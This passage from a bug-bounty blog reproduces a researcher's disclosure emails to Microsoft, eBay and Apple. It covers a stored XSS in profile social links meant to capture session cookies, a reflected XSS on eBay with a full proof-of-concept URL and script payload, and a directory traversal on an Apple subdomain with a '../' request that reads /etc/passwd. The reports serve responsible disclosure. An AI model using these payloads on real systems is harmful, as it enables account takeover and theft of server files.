3. Open TamperData and click "<strong>Start Tampering</strong>", after that click "submit" on the edit page.<br />
<br />
4. Tamper the post request sent by the following url: <em> "https://social.microsoft.com/Profile/u/edit?displayName=MSOBB_Test_Account"</em> <br />
<br />
5. Modify the following post parameter: <em> name="SocialLink_Facebook"\r\n\r\nhttp://facebook/com/demouser\r\n--------</em> and<strong> replace</strong> it by our<strong> Payload</strong>(Mentioned Above)<br />
<br />
6. Open TamperData and click "Stop Tampering" .<br />
<br />
7. Now our malicious javascript code is embedded with our social profile button.<br />
<br />
8. Now attack will be performed whenever some user tries to connect with us through our social profile buttons.<br />
<br />
<strong>Brief description of the issue:</strong> The vulnerability i am reporting is caused due to only client side and no server side input validation of the social profile link at the Affected URL, by modifying the http headers of the post request an attacker is able to provide his own custom malicious code in place of the social profile URL which can be used to capture the session cookies of the logged in user.<br />
<br />
By capturing the session cookies an attacker is able to completely take over the user&apos;s microsoft account and most of his microsoft connected services (Tested with Outlook)<br />
<br />
During my research i have also discovered that the Microsoft Social homepage(<em>https://social.microsoft.com/Profile/</em>) shows a leaderboard of Most Active Contributors. These contributors get visited daily by mass amount of users, if an attacker is able to get his malicious profile on the list then a large amount of users can be affected by this vulnerability which is a very serious issue and a cause of concern. My suggestion is to patch this vulnerability as soon as possible before it gets discovered by some cracker and gets exploited.<br />
<br />
Let me know if you require any other information, i will be happy to assist.<br />
<em>Regards<br />Amit Kumar(Ak)<br />cse@engineer.com</em><br />
<em>-------------------------------------End of eMail-------------------------------------</em></div>
<div class="prose">
<b>Proof of Concept:</b></div>
<div class="prose">
<b><br /></b></div>
<div class="prose">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-CbWDcCs_OHg/WKq2HdVbsUI/AAAAAAAAAB8/8wJu6iKVMhMIORZmE8n3_1s3MX9BExQswCLcB/s1600/XSS%2Bcookie%2Balert.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://1.bp.blogspot.com/-CbWDcCs_OHg/WKq2HdVbsUI/AAAAAAAAAB8/8wJu6iKVMhMIORZmE8n3_1s3MX9BExQswCLcB/s640/XSS%2Bcookie%2Balert.JPG" width="640" /></a></div>
<b><br /></b></div>
<div class="prose">
<b>Hall of Fame:</b></div>
<div class="prose">
<b><br /></b></div>
<div class="prose">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Fm2h9KX_nMc/WKq15gPxCQI/AAAAAAAAAB0/WzvoKz8nY5AwLWXcoD6UbguiDlG1v2ngQCLcB/s1600/Microsoft%2BApril.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-Fm2h9KX_nMc/WKq15gPxCQI/AAAAAAAAAB0/WzvoKz8nY5AwLWXcoD6UbguiDlG1v2ngQCLcB/s1600/Microsoft%2BApril.JPG" /></a></div>
<em><br /></em></div>
</ul>
</div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com0tag:blogger.com,1999:blog-7421436727677135031.post-67071890216725960352015-09-10T02:37:00.000-07:002017-02-20T01:33:34.135-08:00[Vulnerability Report] Non-Persistent XSS on eBay.com<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="irc_mimg irc_hic iUrVYqQKQGr0-lvVgf-rIiHk">
<a class="irc_mil i3597 iUrVYqQKQGr0-zixyDjKkw5M" data-noload="" data-ved="0ahUKEwimvbTYwt7NAhUPT48KHWsMB0wQjRwIBw" href="https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=0ahUKEwimvbTYwt7NAhUPT48KHWsMB0wQjRwIBw&url=https%3A%2F%2Fcommons.wikimedia.org%2Fwiki%2FFile%3AEBay_logo.svg&bvm=bv.126130881,d.c2I&psig=AFQjCNHeVWasUIqY0z0AyfVoOtiuNpkLsw&ust=1467883587374181" tabindex="0" target="_blank"><img alt="" class="irc_mi iUrVYqQKQGr0-pQOPx8XEepE" height="256" src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/1b/EBay_logo.svg/2000px-EBay_logo.svg.png" style="margin-top: 45px;" width="640" /></a><br />
<div class="MsoNormal">
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The following is my report on a serious vulnerability which i had discovered on eBay .com, for which i was also awarded a place at <em>eBay Hall of Fame</em>.</span></div>
<div class="MsoNormal">
<span style="font-size: large;"><br /></span> <span style="font-size: large;"></span></div>
<div class="MsoNormal">
<span style="font-size: large;"></span></div>
<div class="MsoNormal">
<span style="font-size: large;"></span></div>
<div class="MsoNormal">
<span style="font-size: large;"><em>---Following is the email which i had sent to eBay Security Team---</em></span></div>
<span style="font-size: large;"> </span>
<br />
<div class="MsoNormal">
<br /></div>
<span style="font-size: large;"> </span>
<br />
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;"><b>Vulnerability Type:</b> Non Persistent XSS </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;"><b>Scope URL:</b> <i><a href="https://deref-mail-02.com/mail/client/dereferrer/?redirectUrl=http%3A%2F%2Fcgi6.ebay.com%2Fws%2FeBayISAPI.dll-SolutionsDirectory" target="_blank">http://cgi6.ebay.com/ws/eBayISAPI.dll-SolutionsDirectory</a> </i></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;"><b>Proof-of-Concept URL:</b> <i><a href="https://deref-mail-02.com/mail/client/dereferrer/?redirectUrl=http%3A%2F%2Fcgi6.ebay.com%2Fws%2FeBayISAPI.dll-MfcISAPICommand%3DSolutionsDirectory%26page%3Dresults%26sort%3DnoSort%26searchText%3D%2522%255d%257d%253B%253C%252Fscript%253E%253C%252Ftd%253E%253C%252Ftr%253E%253CBODY%2BONLOAD%253Dalert%2528%2522XSS-By-Ak%2522%2529%253E%253B%26Submit%3DSearch%2BDirectory" target="_blank"> http://cgi6.ebay.com/ws/eBayISAPI.dll-MfcISAPICommand=SolutionsDirectory&page=results&sort=noSort&searchText=%22]}%3B%3C%2Fscript%3E%3C%2Ftd%3E%3C%2Ftr%3E%3CBODY+ONLOAD%3Dalert%28%22XSS-By-Ak%22%29%3E%3B&Submit=Search+Directory</a>+ </i></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><b><span style="font-family: "times new roman" , serif;">Vulnerability Reproduction Steps(POC): </span></b></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">1. Visit the Scope URL as mentioned above. </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">2. Enter the following payload in the search field: <i>"]};; <script>alert(</i></span><span style="font-family: "times new roman" , serif;"><i><span style="font-family: "times new roman" , serif;">"XSS-By-Ak" </span>)</script></i></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">3. After the search our URL becomes the same as POC URL which delivers the XSS alert payload "XSS-By-Ak" </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">System Details: Firefox 41 on windows 8.1 </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">Let me know if you require any other information, i will be happy to assist. </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">Regards </span></span></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">Amit Kumar(Ak) </span></span></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;"><a href="https://3c-lxa.mail.com/mail/client/mail/mailto;jsessionid=288B47225BB5FC8E7099AE36F39CE703-n2.lxa14a?to=cse%40engineer.com" target="_parent">cse@engineer.com</a></span></span></div>
<div class="MsoNormal">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><span style="font-size: large;"><em>-------------------------------------End of eMail-------------------------------------</em></span> </span><br />
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><br /></span>
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><b>Acknowledgement:</b></span><br />
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><b><br /></b></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-xozoHPeGJTk/WKq3s4VuxnI/AAAAAAAAACI/70oY7jMo_wU_W8Wk13BvgVhyFkbAbZVZQCLcB/s1600/ebay.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-xozoHPeGJTk/WKq3s4VuxnI/AAAAAAAAACI/70oY7jMo_wU_W8Wk13BvgVhyFkbAbZVZQCLcB/s1600/ebay.JPG" /></a></div>
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><b><br /></b></span></div>
</div>
</div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com2tag:blogger.com,1999:blog-7421436727677135031.post-70669609960551285772015-07-07T05:50:00.000-07:002017-03-25T03:29:51.445-07:00[Vulnerability Report] Directory Traversal Attack in subdomain of Apple.com<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-cgqH7H9N7sM/WNZGk5UVAdI/AAAAAAAAAD4/UIjM5eFo_1Q6yuxfNMuhpCCOB-xtIINjgCLcB/s1600/AAEAAQAAAAAAAAUgAAAAJGUwYjYzYmVjLTgwNGUtNGYzYi1hZmVkLTNjMmQ3MTVlNTUxYQ.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://1.bp.blogspot.com/-cgqH7H9N7sM/WNZGk5UVAdI/AAAAAAAAAD4/UIjM5eFo_1Q6yuxfNMuhpCCOB-xtIINjgCLcB/s400/AAEAAQAAAAAAAAUgAAAAJGUwYjYzYmVjLTgwNGUtNGYzYi1hZmVkLTNjMmQ3MTVlNTUxYQ.jpg" width="400" /></a></div>
<br />
Report: Apple flaw that leads to sensitive file disclosure<br />
<br />
The following is my report on a serious vulnerability which I had discovered on one of the apple.com's subdomains for which I was also awarded a place at <i>Apple Hall of Fame</i>.<br />
<br />
<i>------------------Following is the email which I had sent to Apple------------------</i><br />
<br />
<b>Vulnerability Type:</b> Directory Traversal Attack<br />
<br />
<b>Abstract:</b> I have discovered one of the apple.com's subdomains vulnerable to <i>directory traversal attack</i> which allows a remote attacker to access sensitive files saved on the webserver that was not intended to be accessible by an unprivileged user.<br />
<br />
<b>Scope:</b> <i><a href="https://3c-lxa.mail.com/mail/client/dereferrer?redirectUrl=http%3A%2F%2Fconsultants.apple.com" rel="nofollow" target="_blank">http://consultants.apple.com</a> </i><br />
<br />
<b>Risk Level:</b> High<br />
<br />
<b>Vulnerability Description: </b> Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access to restricted directories and files. Directory traversal attacks use web server software to exploit inadequate security mechanisms giving them root access to directories and files stored on the webserver.<br />
<br />
<b>Affected URL:</b> <i><a href="https://3c-lxa.mail.com/mail/client/dereferrer?redirectUrl=https%3A%2F%2Fconsultants.apple.com%2FpublicLocator%2FdownloadProfile%2FdownloadProfile%3Fexecution%3De1s1%26id%3D%252Fimages%252FpublicLocator%252FPDF_RequirementstoJoin_ACN_May2015.pdf" rel="nofollow" target="_blank">https://consultants.apple.com/publicLocator/downloadProfile/downloadProfile?execution=e1s1&id=%2Fimages%2FpublicLocator%2FPDF_RequirementstoJoin_ACN_May2015.pdf</a> </i><br />
<br />
<b>Vulnerability Impact Scenario: </b><br />
A remote attacker is able to download critical files from apple's webserver such as <i>/etc/passwd,</i> configuration files and log files which may result in "<i>Sensitive Information Disclosure"</i> and may also allow the attacker to carry out further attacks on the system using the information gathered through this vulnerability.<br />
<br />
<b>Vulnerability Reproduction Steps(POC):</b><br />
<b> </b> <br />
<b>1.</b> Visit the Affected URL as mentioned above.<br />
<br />
<b>2.</b> Modify the following parameter <b>"</b> <i>e1s1&id=%2Fimages%2FpublicLocator%2FPDF_RequirementstoJoin_ACN_May2015.pdf</i> <b>"</b> with <b>"</b> <i>../../../../../../../etc/passwd</i> <b>"</b> <br />
<br />
<b>3.</b> So our final URL becomes " <b><i>https://consultants.apple.com/publicLocator/downloadProfile/downloadProfile?execution=e1s1&id=../../../../../../../etc/passwd</i></b> "<br />
<br />
<b>4.</b> The final URL which we have generated allows us to traverse /root directory of the webserver and as a POC(Proof Of Concept) we can see that URL which we have generated allows us to view the <i>/etc/passwd</i> file of the system. <b><br /></b><br />
<br />
<b>Brief description of the issue: </b> The vulnerability i am reporting is known as <i>Directory Traversal Attack</i> which is caused due to poor input validation in the <i>Affected URL</i>, the following parameter of the affected URL "<i><b>id=</b></i>" accepts path of the file to be downloaded, but due to insufficient security validation/sanitization of user-supplied input file names we can provide custom queries and traverse up to the root directory of the webserver using<b> </b>"<i><b>../</b></i>" (Go Up).<br />
<div class="prose">
<br />
Directory Traversal Attack is a serious vulnerability which is capable of compromising the entire web server, not just the single subdomain which I have reported but all the websites which are hosted on the same server. My suggestion is to patch this vulnerability as soon as possible before it gets discovered by some cracker and gets exploited.<br />
<br />
Let me know if you require any other information, I will be happy to assist.<br />
<br />
<i>Regards</i><br />
<i>Amit Kumar(Ak)</i><br />
<i><a href="https://www.blogger.com/null" rel="nofollow" target="_blank">cse@engineer.com</a></i><br />
<i>-------------------------------------End of eMail-------------------------------------</i><br />
<i><br /></i>
<b>Acknowledgement:</b><br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-nCbmh_XYIr4/WKq3MUxxM0I/AAAAAAAAACE/9z7JgeiNacARzEzoXZWVg3huXI-CS1-qwCLcB/s1600/Apple.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://3.bp.blogspot.com/-nCbmh_XYIr4/WKq3MUxxM0I/AAAAAAAAACE/9z7JgeiNacARzEzoXZWVg3huXI-CS1-qwCLcB/s640/Apple.JPG" width="640" /></a></div>
<i><br /></i></div>
<div id="floating-share-button" style="top: 736.483px;">
<div class="">
<div class="dropdown-wrapper js-dropdown">
<div class="tooltip-wrapper">
</div>
</div>
</div>
</div>
</div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com0